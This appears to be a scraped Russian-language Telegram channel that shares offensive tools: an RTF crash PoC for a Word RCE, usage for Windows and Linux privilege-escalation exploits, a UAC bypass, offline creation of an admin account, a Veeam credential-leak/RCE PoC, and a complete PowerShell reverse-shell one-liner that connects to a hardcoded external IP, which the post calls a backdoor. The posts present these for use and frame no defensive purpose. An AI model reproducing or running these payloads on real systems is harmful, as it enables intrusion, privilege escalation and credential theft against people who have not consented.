This media is not supported in your browser
VIEW IN TELEGRAM
Внимание !
через 10 минут опять понедельник.
Вот вам rootkit dog
😎
через 10 минут опять понедельник.
Вот вам rootkit dog
😎
🔥20😱6👍2
0-CLICK Microsoft Word RCE exploit
CVE-2023-21716 Python
CVE-2023-21716 Python
PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))😱16👍7🔥1
CVE-2023-21768 Local Privilege Escalation
Windows 11 22H2
POC exploit
*
usage:
#windows #lpe
Windows 11 22H2
POC exploit
*
usage:
Windows_AFD_LPE_CVE-2023-21768.exe <pid>
где <pid> это id процесса который нужно повысить до system#windows #lpe
😱10👍3🔥2
Offline создание администратора Windows 10? 😈
Ога
Всё через встроенные DLL-файлы offlinelsa и offlinesam. Официально, но не очень документировано.
OfflineAddAdmin2 (это новая версия)
Видео туториал
Ога
Всё через встроенные DLL-файлы offlinelsa и offlinesam. Официально, но не очень документировано.
OfflineAddAdmin2 (это новая версия)
Видео туториал
😱9🔥2👍1
PowerShell открывает TCP-сокет на удаленном сервере и выполняет ввод в виде команды, отправляя вывод обратно.
Тупо бэкдор!
usage:
Тупо бэкдор!
usage:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"🔥34😱9👍5
UAC bypass for x64 Windows 7 - 11
Понятно
iscsicpl.exe уязвим к перехвату порядка поиска DLL при запуске 32-битного бинарного файла Microsoft на 64-битном хосте через SysWOW64.
Понятно
iscsicpl.exe уязвим к перехвату порядка поиска DLL при запуске 32-битного бинарного файла Microsoft на 64-битном хосте через SysWOW64.
😱7👍1
kernel-linux-factory
*
Удобно тем, что не нужно компилировать или настраивать среду, глянул какое ядро, запустил сплоет, получилпо морде #root
*
в составе exploits для:
CVE-2016-9793
4-20-BPF-integer
CVE-2017-5123
CVE-2017-6074
CVE-2017-7308
CVE-2017-8890
CVE-2017-11176
CVE-2017-16995
CVE-2017-1000112
CVE-2018-5333
CVE-2019-9213 & CVE-2019-8956
CVE-2019-15666
CVE-2020-8835
CVE-2020-27194
CVE-2021-3156
CVE-2021-31440
CVE-2021-3490
CVE-2021-22555
CVE-2021-41073
CVE-2021-4154
CVE-2021-42008
CVE-2021-43267
CVE-2022-0185
CVE-2022-0847
CVE-2022-0995
CVE-2022-1015
CVE-2022-2588
CVE-2022-2639
CVE-2022-25636
CVE-2022-27666
CVE-2022-32250
CVE-2022-34918
download
#linux #exploits #kernel
*
Удобно тем, что не нужно компилировать или настраивать среду, глянул какое ядро, запустил сплоет, получил
*
в составе exploits для:
CVE-2016-9793
4-20-BPF-integer
CVE-2017-5123
CVE-2017-6074
CVE-2017-7308
CVE-2017-8890
CVE-2017-11176
CVE-2017-16995
CVE-2017-1000112
CVE-2018-5333
CVE-2019-9213 & CVE-2019-8956
CVE-2019-15666
CVE-2020-8835
CVE-2020-27194
CVE-2021-3156
CVE-2021-31440
CVE-2021-3490
CVE-2021-22555
CVE-2021-41073
CVE-2021-4154
CVE-2021-42008
CVE-2021-43267
CVE-2022-0185
CVE-2022-0847
CVE-2022-0995
CVE-2022-1015
CVE-2022-2588
CVE-2022-2639
CVE-2022-25636
CVE-2022-27666
CVE-2022-32250
CVE-2022-34918
download
#linux #exploits #kernel
👍22🔥3😱1
CVE-2023-27532
Да, опять Veeam Backup & Replication
Утечка учёток в виде открытого текста, либо выполнение удаленного выполнения команды.
*
Аналитика
*
POC exploit
*
usage:
Да, опять Veeam Backup & Replication
Утечка учёток в виде открытого текста, либо выполнение удаленного выполнения команды.
*
Аналитика
*
POC exploit
*
usage:
VeeamHax.exe --target 192.168.0.100
илиVeeamHax.exe --target 192.168.0.100 --cmd calc.exe
#veeam #rce #leakPass🔥12👍6